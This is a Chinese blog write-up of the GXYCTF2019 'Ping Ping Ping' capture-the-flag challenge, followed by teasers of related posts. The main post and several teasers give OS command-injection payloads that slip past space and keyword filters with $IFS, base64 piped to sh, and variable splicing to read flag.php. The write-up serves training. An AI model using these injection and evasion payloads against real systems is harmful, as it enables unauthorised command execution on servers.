GXYCTF2019]Ping Ping Ping

最新推荐文章于 2024-07-25 14:14:33 发布
最新推荐文章于 2024-07-25 14:14:33 发布
阅读量98 收藏
点赞数 1
分类专栏: CTF 文章标签: php linux ctf 命令执行 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45924653/article/details/120116458
版权

命令执行 ls命令下有flag.php

在这里插入图片描述
提示空格被过滤w

在这里插入图片描述
命令执行中空格可以使用< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS过滤
$IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用,但是为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。

在这里插入图片描述
过滤了/ + * ? { } ( ) [ ] falg 绕过flag
使用base64编码绕过

在这里插入图片描述
过滤了bash但是可以使用sh
payload

echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

在这里插入图片描述
变量覆盖
payload

a=g;cat$IFS$9fla$a.php

在这里插入图片描述

人生漫漫其修远兮,网安无止境。
一同前行,加油!

c7ay.
关注
专栏目录
GXYCTF2019 Ping Ping Ping 1
qq_52715164的博客
04-17 1432
解题步骤: 1,尝试用输入一个正确的IP地址 2,发现是linux系统下的网站,尝试用|和ls查看目录,列出文件 3,尝试查看flag文件,发现不能直接打开,且空格被过滤,原因:关键字被过滤 4,找到被过滤字符名单,尝试打开index.php文件,发现过滤字符列表 5,尝试绕过 代码中有个 $a 考虑进行变量覆盖,构造如下 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ?ip=127.0.0.1;a=g,cat$IFS$1fla$a.php 或者另外一种方
[GXYCTF2019]Ping Ping Ping1
weixin_61021815的博客
05-14 1675
进入页面没有什么东西,尝试填一下ip 可以 使用多命令执行符 ; 无论逻辑 && 命令1正确则命令2执行命令1错误则命令2不执行 || 命令1错误命令2执行命令2错误则命令1执行 构造?ip=127.0.0.1 ;ls 构造?ip=127.0.0.1;cat flag.php 发现存在过滤 空格 想办法绕过一下 1.${IFS} 2.$IFS$1 3.${IFS 4.%20 5.<和<>重定向符替换 6.%09替换 注:...
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 7997
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
[GXYCTF2019]Ping Ping Ping
qq_37466661的博客
08-27 3512
[GXYCTF2019]Ping Ping Ping CTF 命令执行
CTF-Web习题:[GXYCTF2019]Ping Ping Ping
最新发布
LJW123487的博客
07-25 656
本题涉及知识点:命令执行漏洞,过滤绕过
[GXYCTF2019]Ping Ping Ping 1
qq_43618536的博客
07-01 2507
BUUCTF的[GXYCTF2019]Ping Ping Ping
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5158
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
buuctf [GXYCTF2019]Ping Ping Ping
m0_63711447的博客
05-25 1378
1、打开题目环境 2、 先ping一下试试 3、直接cat flag,提示说不能有空格 4、用%09过滤空格,可能是过滤了特殊的字符 5、
[GXYCTF2019]Ping Ping Ping 解题纪要
qq_37079022的博客
07-09 163
绕过后出现新的报错 flag被拦截那就换个文件 换index.php。能访问 那就存在命令执行加上一个ls 看看都有什么文件。也可以用*替换 如cat fl*.php但是被过滤了。重点2 如何绕过字母使用其他字母赋值 然后用$引用。使用<、<>、$IFS$1 (内部字段分隔符)看到了flag.php cat一下就成功了。ip=那就评一个ip。重点1 linux中空格的过滤如何绕过。字母,无论它们之间有多少其他字符。源码中出现 此行内容将检查。
BUUCTF [GXYCTF2019]Ping Ping Ping 1
m0_62879498的博客
03-11 5888
[GXYCTF2019]Ping Ping Ping 1 在本题我们考察的是命令执行 已进入本关,我们发现他在询问 ?ip 我们先尝试输入 ?ip=127.0.0.1 发现访问成功 查询一下它的目录: ?ip=127.0.0.1|ls 发现有两个文件夹flag.php,index.php,发现 flag 我们尝试访问 flag。 ?ip=127.0.0.1|cat flag.php 点击查询, 很明显我们需要进行一个空格的过滤 空格过滤常见绕过注释: < > %20(spac
BUUCTF[GXYCTF2019]Ping Ping Ping
楼阁de猫的博客
12-19 252
[GXYCTF2019]Ping Ping Ping 直接ping 127.0.0.1 有回显,ls一下 发现flag.php,cat一下 事情果然没有这么简单,这里空格被过滤了,下面有几种绕过空格的方法 $IFS ${IFS} $IFS$9 //$9改成 $ 加其他数字貌似都行 < <> {cat,flag.php} //用逗号实现了空格功能 %20 (space) %09(Tab) 这里用 $IFS$9绕过空格之后,发现flag又被ban了,那就cat一下index.p
[GXYCTF2019]Ping Ping Ping (命令执行)
一期一会的博客
12-27 715
命令执行 过滤空格 %20(space)、%09(tab)、$IFS$9、 IFS、IFS 使用<或者<>来绕过空格 cat<a.txt 花括号扩展{OS_COMMAND,ARGUMENT} {cat,/etc/passwd} IFS空格绕过catIFS 空格绕过 catIFS空格绕过catIFSa.txt 变量控制 X=$'cat\x09./flag.php 关键字过滤 使用空变量 使用∗和*和∗和@,x(x代表1−9),x(x 代表 1-9),x(x代表1−9),{x}(x&gt
BUUCTF__[GXYCTF2019]Ping Ping Ping_题解
风过江南乱的博客
06-25 3150
前言 我感觉我是一个假的理科生,假的计算机相关专业学生,完全没有该有的样子 这题有点东西,不算太水。只是对我来说。 读题 题目是Ping,打开也没有内容,就一个get传参的ip变量 不过看到ip和ping就容易联想到,终端ping命令。 先尝试传入一个ip=127.0.0.1,于是乎出现了如下,在终端下执行的效果就是这样,命令执行石锤了。 命令执行可以干很多事,也就是命令行,LInux下大佬们日常操作都用命令行代替鼠标。 首先想到用什么办法?让它执行我们需要的命令。很明显变量ip是突破点。 先看传
[极客大挑战 2019]Secret File 1
她叫常玉莹
03-15 4465
开局一个页面开干,粗略看了下源码开始没发现啥(大意了,主要盯注释了),试了robots.txt没有东西,目录用dirsearch扫了一遍也没有什么发现,擦 后来发现源码里发现了,这不就来了嘛 点进去一看发现了action.php 一点直接就变成了end.php这不是有重定向嘛 有大问题,遇事不决先抓包 果然action.php直接跳转end.php,响应包中发现secr3t.php访问一下,是一段php代码 文件包含没有过滤fillter直接伪协议拿下 secr3t.php?file=php://.
[HCTF 2018]admin
她叫常玉莹
04-21 2482
来到题目的主页面,看到主页右面有一个下拉框,有登陆,注册功能,注册个用户再说,登陆后有编辑、更改密码、登出功能。 源码中hint提示不是admin,题目肯定是想让我们登陆admin用户,在更改密码页面源码中有一个github地址,去看一下github 是一个flask项目下载下来审计一下,先看下路由routes.py index函数 @app.route('/') @app.route('/index') def index(): return render_template('index.ht
[RoarCTF 2019]Easy Calc
她叫常玉莹
09-16 964
查看源码发现calc.php文件 calc.php文件 本题考查PHP字符串解析漏洞 PHP将查询字符串(在URL或正文中)转换为内部GET或的关联数组_GET或的关联数组G​ET或的关联数组_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42) PHP将所有参数转换为有效的变量名 删除空白字符 将某
2021CTF红明谷杯数据安全大赛 write_shell
她叫常玉莹
07-30 788
<?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ return $input;
[BUUCTF 2018]Online Tool
她叫常玉莹
06-30 757
[BUUCTF 2018]Online Tool wp
CTF[网鼎杯]Fakebook
她叫常玉莹
08-25 640
robots中发现 user.php.bak文件 下载文件 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this->age = (int)$age;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值